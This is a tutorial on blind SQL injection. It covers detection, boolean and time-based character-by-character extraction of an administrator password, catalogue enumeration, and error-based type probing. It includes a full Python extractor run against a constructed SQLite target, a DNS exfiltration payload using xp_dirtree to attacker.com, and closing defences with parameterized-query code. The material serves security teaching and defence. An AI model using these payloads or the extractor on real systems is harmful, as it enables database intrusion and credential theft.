
Blind SQL Injection

Blind SQL injection is a type of SQL injection attack that occurs when an application is vulnerable to SQL injection, but the attacker cannot see:

  • The results of their injected queries
  • Database error messages
  • Any direct SQL output

Think of it like trying to guess the content of a locked box by asking only yes/no questions - you can’t see inside, but you can learn about its content through careful questioning.

Why is it “Blind”?

Unlike regular SQL injection where attackers can see query results directly:

  • No data is displayed in the response
  • No error messages reveal database information
  • Attackers must rely on indirect indicators

How to Detect Blind SQL Injection

1. Boolean-Based Detection

Test whether the application responds differently depending on whether an injected condition is true or false.

Original Request

Cookie: TrackingId=original_value

Test Cases

-- True condition: the WHERE clause still matches, so the response should be identical to the original request
TrackingId=original_value' AND 1=1--
-- False condition: no row matches any more
TrackingId=original_value' AND 1=2--

Result: the two requests produce different responses.

When the condition is true (1=1) the application behaves exactly as it does for the original value. When the condition is false (1=2) the query returns nothing, so the application may behave differently: a message that is no longer shown, a different status code, a changed page. Two identical responses are inconclusive rather than proof of safety; try the other injection contexts (numeric values need no quote, some queries need a closing parenthesis) before moving on. Note that MySQL only treats -- as a comment when it is followed by whitespace, so send "-- " (or "#") there.

2. Response Indicators

Look for differences in:

  • Success messages
  • Error messages
  • HTTP status codes
  • Page content
  • Response timing

Exploitation Techniques

1. Boolean-Based Data Extraction

Extract data one character at a time by asking TRUE/FALSE questions. Each request tests one hypothesis about one character of the target value; determine the value's length first (LEN() in MSSQL, LENGTH() in MySQL) so the loop has a stopping point.

Example Scenario

  • Goal: Extract administrator’s password
  • Table Structure: Users(Username, Password)

Step-by-Step Process

  1. First Character Position
-- Is the first character greater than 'm'? (narrows the candidate range)
xyz' AND SUBSTRING((SELECT Password FROM Users
WHERE Username='Administrator'), 1, 1) > 'm'--
-- Is the first character equal to 's'?
xyz' AND SUBSTRING((SELECT Password FROM Users
WHERE Username='Administrator'), 1, 1) = 's'--
  2. Subsequent Characters
-- Second character
xyz' AND SUBSTRING((SELECT Password FROM Users
WHERE Username='Administrator'), 2, 1) = 'e'--
-- Continue for each position until the length of the value is reached

Optimization Tips

  • Use binary search on the character value (> 'm', then > 's', ...) instead of testing every candidate: about 7 requests per character for printable ASCII instead of up to 95
  • Start with common characters when guessing directly (letters and digits before punctuation)
  • Send requests for several positions concurrently; each position is an independent question
  • Account for case sensitivity: many default collations compare strings case-insensitively, so compare with BINARY/COLLATE or on ASCII()/UNICODE() code points instead of on characters

2. Time-Based Extraction

When the response content is identical for true and false conditions, use a conditional time delay instead: the answer is read from the response latency.

-- MySQL: sleep 5 seconds only if the condition is true (note the space after --)
xyz' AND IF(SUBSTRING((SELECT Password FROM Users WHERE Username='Administrator'),1,1)='a',SLEEP(5),0)-- 
-- MSSQL: stacked query, WAITFOR only runs if the condition holds
'; IF (SELECT COUNT(*) FROM Users WHERE Username='Administrator'
AND SUBSTRING(Password, 1, 1) = 'a') = 1
WAITFOR DELAY '0:0:5'--
-- If the first character is 'a', the response arrives about 5 seconds late

Pick a delay clearly longer than the normal response-time jitter, re-send borderline results, and remember that a delay placed in a WHERE clause can run once per row the query examines, so the total wait may be a multiple of the value you chose.
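The boolean loop above and the time-based variant can be driven by the same extraction code. The following is an added example, not code from the original page: it builds a constructed SQLite stand-in for the target (assumed tables Users(Username, Password) and TrackingIds, plus a fake SLEEP() registered because SQLite has no such function; real targets speak MSSQL/MySQL) and recovers the Administrator password through either oracle with a binary search on the code point of each character, roughly 7 questions per character.

```python
import sqlite3
import time

# Constructed stand-in for the vulnerable application (assumption: the page's
# Users(Username, Password) table plus a TrackingIds table looked up from the
# cookie, in an in-memory SQLite database).
def build_target():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Users(Username TEXT, Password TEXT);
        INSERT INTO Users VALUES ('Administrator', 's3cr3t!Pw');
        INSERT INTO Users VALUES ('wiener', 'peter');
        CREATE TABLE TrackingIds(TrackingId TEXT);
        INSERT INTO TrackingIds VALUES ('xyz');
    """)
    # SQLite has no SLEEP(); register one so a MySQL-style delay payload works here.
    conn.create_function("SLEEP", 1, lambda secs: time.sleep(secs) or 0)
    return conn

def vulnerable_page(conn, tracking_id):
    """The flaw: the cookie value is concatenated straight into the SQL text.
    Errors are swallowed and no data is echoed, so the injection is blind."""
    sql = "SELECT 1 FROM TrackingIds WHERE TrackingId = '" + tracking_id + "'"
    try:
        hit = conn.execute(sql).fetchone()
    except sqlite3.Error:
        hit = None
    return "Welcome back!" if hit else "Welcome"

def boolean_oracle(conn):
    """Boolean-based: the greeting differs depending on whether the AND'ed condition holds."""
    def ask(condition):
        payload = "xyz' AND (" + condition + ")--"
        return vulnerable_page(conn, payload) == "Welcome back!"
    return ask

DELAY = 0.05  # seconds; a real attack uses several seconds to beat network jitter

def time_oracle(conn):
    """Time-based: the response text is the same either way (both branches make the
    WHERE clause false); only the latency reveals the answer."""
    def ask(condition):
        payload = "xyz' AND (CASE WHEN (" + condition + ") THEN SLEEP(%s) ELSE 0 END)--" % DELAY
        start = time.perf_counter()
        vulnerable_page(conn, payload)
        return time.perf_counter() - start >= DELAY / 2
    return ask

SECRET = "(SELECT Password FROM Users WHERE Username='Administrator')"

def bisect(ask, expr, lo, hi):
    """Smallest v in [lo, hi] with expr <= v, found by asking 'expr > mid' questions."""
    while lo < hi:
        mid = (lo + hi) // 2
        if ask("%s > %d" % (expr, mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo

def extract(ask, max_len=64):
    """Recover the secret: first its length, then each character by code point."""
    length = bisect(ask, "length(%s)" % SECRET, 1, max_len)  # assumption: length in 1..max_len
    chars = []
    for pos in range(1, length + 1):
        # unicode()/substr() are SQLite's spelling of ASCII()/SUBSTRING(); comparing
        # code points sidesteps case-insensitive collations. Printable ASCII assumed.
        code = bisect(ask, "unicode(substr(%s, %d, 1))" % (SECRET, pos), 32, 126)
        chars.append(chr(code))
    return "".join(chars)

if __name__ == "__main__":
    target = build_target()
    print("boolean-based:", extract(boolean_oracle(target)))
    print("time-based:   ", extract(time_oracle(target)))
```

The extractor only depends on an ask(condition) -> bool callable, which is the point: swapping the boolean oracle for the timing oracle (or an error-based one) changes nothing in the search logic, and the same bisect() can be pointed at catalogue views to recover table and column names.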

Advanced Techniques

1. Database Schema Enumeration

Before extracting data you usually need to know where it lives. The same boolean oracle answers questions about the catalogue views (information_schema on MySQL, PostgreSQL and MSSQL; all_tables/all_tab_columns on Oracle).

-- Does a table called Users exist? (>0 rather than =1: the name may exist in several schemas)
xyz' AND (SELECT COUNT(*) FROM information_schema.tables
WHERE table_name='Users')>0--
-- Does it have a Password column?
xyz' AND (SELECT COUNT(*) FROM information_schema.columns
WHERE table_name='Users' AND column_name='Password')>0--

Identifier comparison may be case-sensitive depending on the platform and collation. Unknown names are recovered with the same SUBSTRING loop as the data, selecting one row at a time from the catalogue view (TOP 1 with a filter on MSSQL, LIMIT 1 OFFSET n on MySQL).

2. Data Type Detection

Sometimes you need to know the data type of a column, or there is no content difference to work with but errors (a 500 status, a generic error page) are observable. A CASE expression turns a condition into an error-or-no-error signal: the ELSE branch is only evaluated when the WHEN condition is false, and there it forces a string through an arithmetic conversion.

-- MSSQL: 1 * 'text' raises a conversion error when Password is a string column,
-- but converts silently when it is numeric. With WHEN (1=2) the ELSE branch always
-- runs; substitute any condition to turn this into a conditional-error oracle
xyz' AND (SELECT CASE WHEN (1=2) THEN 1
ELSE 1*(SELECT Password FROM Users WHERE Username='Administrator') END)=1--

The inner SELECT must return a single row; without the WHERE clause the subquery itself errors on every request and tells you nothing about the column. MySQL typically returns 0 with a warning for 1*'abc' rather than raising, so this variant is MSSQL-specific.

3. Out-of-Band Data Extraction

When neither content nor timing differs, or when a character-at-a-time loop is too slow, make the database itself send the data out over a channel the attacker controls. A DNS lookup is the usual choice: it is almost always allowed out of server networks, and the attacker only needs an authoritative nameserver for the zone (their own, or a service such as Burp Collaborator) that logs the queries it receives.

-- DNS-based extraction (MSSQL): xp_dirtree lists a UNC path, which forces a name lookup
'; DECLARE @p varchar(1024);
SET @p=(SELECT TOP 1 Password FROM Users);
exec('master..xp_dirtree "//'+@p+'.attacker.com/a"')--
-- The nameserver for attacker.com receives a query for <password>.attacker.com

Caveats: the database login needs permission to execute xp_dirtree; TOP 1 without ORDER BY returns an arbitrary row; and a raw password makes a poor hostname label (63-octet limit per label, and only letters, digits and hyphens are safe), so hex-encode it first, e.g. CONVERT(varchar(max), CONVERT(varbinary(max), @p), 2), and split long values over several lookups.

Defense Strategies

  • Use parameterized queries (prepared statements) for every query that includes user input; this removes the root cause
  • Input validation with an allow-list of the exact format expected (a tracking cookie has a known alphabet and length)
  • Stored procedures only help if they do not build dynamic SQL from their arguments
  • ORM frameworks with their query builders, avoiding raw-SQL escape hatches that format strings
  • Least privilege for the database account: read-only where possible, no xp_dirtree/xp_cmdshell, no access to other schemas, so a successful injection has little to reach
  • Block outbound DNS and other egress from database hosts, and alert on slow or unusual queries, to cut off the out-of-band and time-based channels
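The first two defences side by side, as an added example that is not part of the original page: the concatenating lookup from the TrackingId scenario, the same lookup with a bound parameter, and an allow-list check in front of it. The in-memory SQLite table and the cookie format are constructed assumptions.

```python
import re
import sqlite3

# Constructed sample database (assumption: the page's TrackingId cookie lookup)
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE TrackingIds(TrackingId TEXT)")
    conn.execute("INSERT INTO TrackingIds VALUES ('xyz')")
    return conn

def lookup_vulnerable(conn, tracking_id):
    """String concatenation: the cookie becomes part of the SQL grammar,
    so ' AND 1=1-- changes the query instead of being compared as a value."""
    sql = "SELECT 1 FROM TrackingIds WHERE TrackingId = '" + tracking_id + "'"
    return conn.execute(sql).fetchone() is not None

def lookup_parameterized(conn, tracking_id):
    """Placeholder plus bound value: the driver passes the value separately from the
    statement text, so quotes, AND and -- are just characters inside a string."""
    row = conn.execute(
        "SELECT 1 FROM TrackingIds WHERE TrackingId = ?", (tracking_id,)
    ).fetchone()
    return row is not None

# Assumption about the application's own cookie format: short alphanumeric token
TRACKING_ID_RE = re.compile(r"[A-Za-z0-9]{3,32}")

def lookup_hardened(conn, tracking_id):
    """Allow-list validation as defence in depth, on top of the parameterized query.
    Validation alone is not a fix: a format that must admit quotes (names, free text)
    cannot be filtered safely, so the parameterized query stays the primary control."""
    if not TRACKING_ID_RE.fullmatch(tracking_id):
        return False
    return lookup_parameterized(conn, tracking_id)

if __name__ == "__main__":
    db = make_db()
    for cookie in ["xyz", "xyz' AND 1=1--", "xyz' AND 1=2--"]:
        print(repr(cookie), lookup_vulnerable(db, cookie),
              lookup_parameterized(db, cookie), lookup_hardened(db, cookie))
```

Against the vulnerable function the two payloads give different answers, which is exactly the boolean oracle from the detection section; against the parameterized one both are simply unknown tracking IDs.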